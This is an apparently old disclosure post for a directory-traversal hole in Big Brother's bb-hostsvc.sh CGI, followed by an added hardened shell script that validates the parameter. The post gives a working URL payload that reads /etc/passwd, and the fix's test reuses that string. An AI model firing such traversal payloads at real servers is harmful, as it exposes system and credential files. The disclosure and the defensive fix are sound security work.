/* Big Brother Exploit For ALL Versions prior to
 * v.1.4h
 *
 * Desc: View the contents of any file on the remote
 * system. Including /etc/passwd.
 *
 * Contributions: Identified and Proof of Concept by
 * Safety@Linuxmail.ORG and Loki [LoA]
 *
 * Greets and shouts to: #smile, #Vastervik, Self, alucard, #RootHat, Lammie (The Infamous
 * Lamagra! We know wuftpd was all about you bro!),
 * InVader (you're totally elite), lockdown
 * (stay elite man!), and Crimson (You're my hero!)
 *
 *
 * Long Live The Empire of the Evil Cow People! MOO!
 */

The problem is that bb-hostsvc.sh uses $HOSTSVC without doing any validity checking on the value assigned to it. Because the parameter is spliced straight into the path "$BBLOGS/$HOSTSVC", a value containing ../ sequences walks out of the log directory and the script cats whatever file the web server user can read.

---- snip ----
# get the color of the status from the status file
set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1
BKG="$1"
---- snap ----

e.g.

http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd

BB4 Technologies has already been notified and a patch is already out. It can be downloaded from http://www.bb4.com/download.html

/* This exploit was found due to the mass intelligence and elite cow-people
 * ingenuity of Safety and his esteemed apprentice cow Loki.
 */

MOO!

--
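A hardened version of the lookup quoted in the snip above, as an added example (not BB4's actual patch and not part of the original post): it rejects any HOSTSVC value that is not a plain file name before touching $BBLOGS, so a ../ sequence can never reach outside the log directory. The log directory, the status file and the function names are constructed for this example.

```shell
#!/bin/sh
# Hardened lookup for the bb-hostsvc.sh status colour (added example).
# Assumes: BBLOGS is the Big Brother log directory and HOSTSVC is the
# untrusted CGI parameter, exactly as in the vulnerable snippet.

# Accept only a plain "host.service" style name: letters, digits, dot,
# dash and underscore; never empty, never a slash, never "..", never a
# leading dot. Anything else is rejected before any file is opened.
valid_hostsvc() {
    case "$1" in
        ""|*/*|*..*|.*)      return 1 ;;
        *[!A-Za-z0-9._-]*)   return 1 ;;
    esac
    return 0
}

# Print the first word of the status file's first line (the colour that the
# original assigns to BKG), or fail without reading anything when the
# name is rejected or the file does not exist under $BBLOGS.
hostsvc_color() {
    _name="$1"
    valid_hostsvc "$_name" || return 1
    _file="$BBLOGS/$_name"
    [ -f "$_file" ] || return 2
    head -n 1 -- "$_file" | awk '{ print $1 }'
}

# Constructed fixture: a throwaway BBLOGS directory with one status file.
BBLOGS=$(mktemp -d)
printf 'green Tue Nov 14 12:00:00 2000 conn ok\n' > "$BBLOGS/www.example.org.conn"

demo() {
    printf 'legit:     %s\n' "$(hostsvc_color www.example.org.conn)"
    if hostsvc_color '/../../../../../../../../etc/passwd'; then
        echo 'traversal: ALLOWED (still vulnerable)'
    else
        echo 'traversal: rejected'
    fi
}

demo
```

The validation happens on the name, not on the resolved path, so it also blocks absolute paths and hidden files without needing realpath or chroot.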